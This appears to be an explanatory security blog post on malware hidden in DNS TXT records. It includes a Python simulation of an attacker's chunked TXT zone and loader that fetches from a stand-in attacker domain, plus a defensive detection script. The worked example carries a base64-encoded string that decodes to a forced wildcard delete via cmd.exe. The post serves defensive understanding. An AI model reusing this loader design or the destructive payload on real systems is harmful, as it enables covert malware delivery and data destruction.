🦠 Malware in DNS Records: A New Front in the Cyberwar

  


Cybercriminals are exploiting DNS records to hide and distribute malicious code, evading traditional security systems. The technique turns an essential Internet service into a covert channel (a means of communication that rides on a seemingly innocuous, legitimate protocol, in this case DNS, to camouflage the traffic) for command and control and for malware updates.

🤔 Do you know anything about malware in DNS?

Yes, the DNS (Domain Name System) has long been abused by cybercriminals. Well-known techniques include DNS tunneling, DNS hijacking, and domain generation algorithms (DGAs), which let malware compute its rendezvous domains instead of hard-coding them. What we are seeing now is a subtler evolution: DNS records used as a repository for the malicious code itself.


🤨 But in what sense do "DNS records contain malware"?

Cybercriminals are turning DNS records into storage for malicious code. They exploit the fact that some record types, TXT records above all, can hold essentially arbitrary text: each string in a TXT record is capped at 255 bytes, but one record can carry many strings and a payload can be spread across several names, so there is no practical size limit. That data is then read by malware already present on the infected system.

The trick is simple and ingenious: hide malicious scripts, configuration, or commands inside a distributed infrastructure that no single party controls and that nearly every network has to let through, because an essential service like DNS cannot simply be blocked.


🤨 So wait... this kind of attack assumes malware is already installed on the PC?

Exactly. DNS itself cannot execute code; it is only a name resolution protocol.
To make use of malicious data stored in DNS records, there must be a component already active on the machine (malware, a script, a macro, a PowerShell agent) that:

  1. Queries a specific domain controlled by the attacker.

  2. Reads the content of the answer (e.g., from a TXT record).

  3. Decodes or decrypts it and executes the result in memory.


🤷‍♂️ So why use DNS? If the malware is already installed, couldn't it do the damage on its own?

Key question. Malware that is already running can, in principle, do anything.
But feeding it through DNS gives the attacker enormous strategic advantages ⬇️

🎯 Why use DNS even after infection?

  • 🕵️‍♂️ Evades detection: DNS traffic is rarely inspected in depth, unlike HTTP/S or FTP, and a lookup of the attacker's domain looks like any other query.

  • 🔁 Modularity: the initial malware can be a bare loader. The real malicious components are delivered piecemeal via DNS and can be swapped at any time by changing a record.

  • 👻 Fileless: payloads are decoded and executed entirely in memory, leaving no file on disk for antivirus to scan.

  • 🎮 Remote control (C2): commands arrive in DNS answers (e.g., in TXT records) and are interpreted locally, so the malware never opens a connection to a suspicious IP or URL.

  • 🧪 Signature bypass: the DNS data can be encrypted, base64-encoded, or fragmented across records, so a static signature on the wire has nothing stable to match.

In other words, the malware becomes "invisible" to antivirus programs because the component that lands on the device carries no malicious payload of its own; the dangerous part only arrives later, through DNS.

๐Ÿ” A practical example?

Here is a simplified flow:

  1. Malware executed via phishing or exploits installs itself as a loader.

  2. Does a DNS query to config.attacker-domain.com.

  3. The returned TXT record contains an encoded string:

    eval(base64_decode("c3lzdGVtKCJjbWQuZXhlIC9jIFwiZGVsZXRlIC9GICpcIg=="))
  4. The malware decodes it and runs it in PowerShell or Python.

  5. The system is further compromised, but without downloading anything over HTTP/S.
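To make the mechanism concrete, here is an added example (not code from the original post, and not a real sample): a Python simulation of the attacker's zone and of the three loader steps described above, with the final "execute" step replaced by simply returning the decoded text. It assumes the hypothetical zone attacker-domain.com from the flow, an in-memory dictionary in place of a real resolver, a trivial XOR key standing in for the encryption the text mentions, and a harmless placeholder string as "stage 2". What it adds to the description is the practical constraint the flow glosses over: each TXT string is at most 255 bytes, so anything bigger is split across strings and across numbered subdomains, and the loader has to reassemble it in order.

```python
import base64
from itertools import cycle

ZONE_APEX = "attacker-domain.com"   # hypothetical zone name from the flow above
MAX_TXT_STRING = 255                 # RFC 1035 <character-string> limit per TXT string
KEY = b"k3y"                         # toy XOR key, standing in for "encrypted" data

# Constructed placeholder for "stage 2": harmless text, long enough that its
# base64 form does not fit in a single 255-byte TXT string.
STAGE2 = (("# constructed placeholder, not real malware\n"
           "Write-Host 'stage two would run here'\n") * 8).encode()


def xor(data: bytes, key: bytes) -> bytes:
    """Symmetric toy obfuscation; applying it twice gives the input back."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def build_zone(payload: bytes, key: bytes = KEY, per_name: int = 2) -> dict[str, list[str]]:
    """Attacker side: obfuscate the payload and spread it over TXT records.

    Returns {owner_name: [txt_string, ...]}. Every string is <= 255 bytes and
    `per_name` strings are packed into one record, so a long payload ends up
    under numbered names p0., p1., ... plus a tiny manifest under config.
    """
    blob = base64.b64encode(xor(payload, key)).decode()
    strings = [blob[i:i + MAX_TXT_STRING] for i in range(0, len(blob), MAX_TXT_STRING)]
    zone = {}
    for n, i in enumerate(range(0, len(strings), per_name)):
        zone[f"p{n}.{ZONE_APEX}"] = strings[i:i + per_name]
    zone[f"config.{ZONE_APEX}"] = [f"v=1;parts={len(zone)}"]
    return zone


def mock_resolve_txt(zone: dict, name: str) -> list[str]:
    """Stand-in for a TXT lookup. A real loader would ask the OS resolver
    (e.g. dnspython's resolver.resolve(name, "TXT")) and get the same list
    of strings back; the dictionary only keeps this example offline."""
    try:
        return zone[name]
    except KeyError:
        raise LookupError(f"NXDOMAIN: {name}") from None


def loader_fetch(zone: dict, key: bytes = KEY, resolve=mock_resolve_txt) -> bytes:
    """Victim side: the three loader steps from the text, minus the exec.

    1. query config.<apex> and parse the manifest it returns
    2. query each chunk name in order and join its TXT strings (strings inside
       one record keep their order on the wire; each name is a separate lookup,
       hence the numbered labels)
    3. base64-decode and XOR back to plaintext. A real loader would now hand
       this to PowerShell/Python in memory; here it is simply returned.
    """
    manifest = dict(kv.split("=", 1)
                    for kv in "".join(resolve(zone, f"config.{ZONE_APEX}")).split(";"))
    parts = int(manifest["parts"])
    blob = "".join("".join(resolve(zone, f"p{n}.{ZONE_APEX}")) for n in range(parts))
    return xor(base64.b64decode(blob), key)


if __name__ == "__main__":
    zone = build_zone(STAGE2)
    for name, strings in zone.items():
        print(f"{name:32} TXT  {len(strings)} string(s), {sum(map(len, strings))} bytes")
    recovered = loader_fetch(zone)
    assert recovered == STAGE2
    print(recovered.decode())
```

The zone dump printed by the script is also the defender's view of this technique: one tiny "config" answer followed by several fat TXT answers for numbered names under the same domain, which is exactly the pattern worth hunting for.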


🛡️ How do you defend against it?

Defending against this technique requires behavioral analysis and DNS visibility. Some countermeasures:

  • Alert on unusual TXT answers: very long records, many strings packed into one record, high-entropy or base64/hex-looking content, and TXT lookups from hosts or processes that have no business making them.

  • Force all client DNS through resolvers you control: block direct outbound port 53 (and DoH/DoT to unapproved resolvers) at the perimeter, so every query is logged and can be filtered.

  • A DNS firewall or RPZ fed by threat intelligence (e.g., Quad9, Cisco Umbrella, Cloudflare Gateway) to sinkhole known-bad domains.

  • Network monitoring that logs full DNS answers, not just query names (e.g., Zeek's dns.log, Suricata's DNS logging), combined with EDR that can tie a lookup to the process that made it and to what it executed next.

  • DNS-oriented threat hunting: rare record types (TXT, NULL), an unusual number of distinct subdomains under one domain from a single host, and lookups repeating on a fixed cadence (beaconing).
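As an added example (not from the original post) of the first and last bullets, here is a small Python hunt that scores TXT answers and per-client lookup patterns over a constructed set of records in the shape a resolver log or Zeek's dns.log would give you. The hosts, names and answers are made up for the example, except the eval(...) string, which is the one from the flow above; the thresholds are illustrative and need tuning to your own zones. The allow-list of well-known TXT prefixes is the caveat a practitioner needs: DKIM keys and site-verification tokens are long and base64-heavy too, and without it they dominate the alerts.

```python
import base64
import math
import re
from collections import Counter, defaultdict

# Long, base64-heavy TXT records that are legitimate: matching these prefixes
# keeps DKIM keys and verification tokens out of the alerts.
BENIGN_PREFIXES = ("v=spf1", "v=DKIM1", "v=DMARC1",
                   "google-site-verification=", "MS=")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
MAX_SANE_TXT = 200              # total TXT bytes; tune to what your zones really use
MIN_SUSPICIOUS_ENTROPY = 4.3    # bits/char: English ~4.0, base64/hex blobs ~5-6
MAX_DISTINCT_NAMES = 5          # distinct names one client asked for under one domain


def shannon_entropy(s: str) -> float:
    """Bits per character; zero for "aaaa", high for encoded blobs."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def decodes_as_base64(token: str) -> bool:
    """True if the token is valid base64 once padded (chunks are often unpadded)."""
    try:
        base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        return True
    except ValueError:          # binascii.Error is a subclass of ValueError
        return False


def score_txt(strings: list[str]) -> list[str]:
    """Reasons an answer looks like a data-carrying TXT record ([] = benign)."""
    text = "".join(strings)
    if text.startswith(BENIGN_PREFIXES):
        return []
    reasons = []
    if len(text) > MAX_SANE_TXT:
        reasons.append(f"{len(text)} bytes of TXT data")
    if len(strings) > 1:
        reasons.append(f"{len(strings)} strings packed into one record")
    ent = shannon_entropy(text)
    if ent > MIN_SUSPICIOUS_ENTROPY:
        reasons.append(f"entropy {ent:.2f} bits/char")
    for m in B64_TOKEN.finditer(text):
        if decodes_as_base64(m.group()):
            reasons.append(f"{len(m.group())}-char base64 token decodes cleanly")
            break
    return reasons


def registered_domain(name: str) -> str:
    """Naive last-two-labels cut; use the Public Suffix List in production."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def hunt(records: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Run both checks over {client, query, qtype, answers} records.

    Returns (client, name_or_domain, reasons) tuples: one per suspicious TXT
    answer, plus one per client/domain pair with too many distinct names,
    which is the shape a chunked download or a beacon leaves in the logs.
    """
    alerts = []
    seen = defaultdict(set)
    for r in records:
        if r["qtype"] == "TXT":
            why = score_txt(r["answers"])
            if why:
                alerts.append((r["client"], r["query"], why))
        seen[(r["client"], registered_domain(r["query"]))].add(r["query"])
    for (client, domain), names in seen.items():
        if len(names) >= MAX_DISTINCT_NAMES:
            alerts.append((client, domain, [f"{len(names)} distinct names queried"]))
    return alerts


# Constructed sample records (hosts, names and the DKIM value are made up).
_CHUNK = base64.b64encode(bytes(range(192))).decode()   # 256 chars of "payload"
SAMPLE_RECORDS = [
    {"client": "10.0.0.5", "query": "example.com", "qtype": "TXT",
     "answers": ["v=spf1 include:_spf.example.net -all"]},
    {"client": "10.0.0.5", "query": "s1._domainkey.example.com", "qtype": "TXT",
     "answers": ["v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDconstructed"]},
    {"client": "10.0.0.7", "query": "config.attacker-domain.com", "qtype": "TXT",
     "answers": ['eval(base64_decode("c3lzdGVtKCJjbWQuZXhlIC9jIFwiZGVsZXRlIC9GICpcIg=="))']},
    {"client": "10.0.0.7", "query": "p0.attacker-domain.com", "qtype": "TXT",
     "answers": [_CHUNK[:255], _CHUNK[255:]]},
] + [
    {"client": "10.0.0.7", "query": f"c{i}.attacker-domain.com", "qtype": "A",
     "answers": ["198.51.100.1"]} for i in range(5)
]


if __name__ == "__main__":
    for client, what, reasons in hunt(SAMPLE_RECORDS):
        print(f"{client:10} {what:30} {'; '.join(reasons)}")
```

The two checks are deliberately independent: the content heuristics catch a single fat TXT answer even from a domain you have never seen, while the distinct-name count catches a chunked download or a beacon whose individual answers are short enough to pass the first check.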


🧵 Conclusion

DNS is no longer just a way to resolve domain names.
It is also a transport for malicious commands and data, one that traditional controls largely ignore.

This makes it essential to integrate DNS traffic into the corporate security plan and treat it as a potential attack vector, not just as an infrastructure service.



Follow me #techelopment

Official site: www.techelopment.it
facebook: Techelopment
instagram: @techelopment
X: techelopment
Bluesky: @techelopment
telegram: @techelopment_channel
whatsapp: Techelopment
youtube: @techelopment